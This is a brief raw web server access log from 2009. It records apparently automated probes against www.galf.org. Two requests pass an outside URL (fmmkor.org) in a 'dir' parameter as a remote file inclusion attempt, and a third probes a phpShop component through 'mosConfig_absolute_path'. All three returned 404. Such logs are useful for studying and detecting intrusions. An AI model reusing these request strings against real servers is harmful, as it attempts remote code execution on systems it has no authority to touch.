62.140.23.192 - - [25/Oct/2009:19:17:42 -0700] "GET /logs/access_090824.log//write.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:19:17:42 -0700] "GET /logs/access_090720.log//write.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:19:18:47 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
